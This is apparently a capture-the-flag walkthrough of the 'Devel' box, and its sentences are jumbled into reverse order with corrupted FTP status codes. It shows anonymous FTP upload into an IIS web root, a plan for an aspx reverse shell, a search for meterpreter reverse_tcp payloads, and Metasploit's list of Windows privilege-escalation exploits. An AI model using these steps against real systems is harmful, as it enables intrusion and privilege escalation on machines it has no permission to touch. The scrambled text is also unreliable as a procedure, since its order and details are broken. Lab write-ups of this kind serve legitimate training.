Msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac_eventvwr We see the following suggested exploits and can try these one by one.
10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable. 10.10.10.5 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable. 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable. 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated. 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated. 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated. 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable. 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable. 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable. 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated. 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable. 10.10.10.5 - 29 exploit checks are being tried. 10.10.10.5 - Collecting local exploits for x86/windows. Meterpreter > run post/multi/recon/local_exploit_suggester Therefore, we can use the first payload that is listed. Windows/meterpreter/reverse_tcp_rc4 Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Windows/meterpreter/reverse_tcp_dns Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly) Windows/meterpreter/reverse_tcp_allports Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Windows/meterpreter/reverse_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged).
Country, HTTPServer, IP, Microsoft-IIS, Title, The Box/devel# msfvenom -list payloads | grep windows | grep meterpreter | grep reverse_tcp This is done as follows The Box/devel# whatweb 10.10.10.5 This can likely work if the file is an aspx given the type of server. Therefore, we can use an exploit which can give us a reverse shell. Therefore, if we put a file into this folder, we can navigate to that file on the browser. Now we can navigate to the file and check if the file has been uploaded and is it rendered by the web server. This is a test file for The Box/devel# ftp 10.10.10.5ģ31 Anonymous access allowed, send identity (e-mail name) as password.ġ25 Data connection already open Transfer starting.ģ0 bytes sent in 0.00 secs (207.7793 kB/s)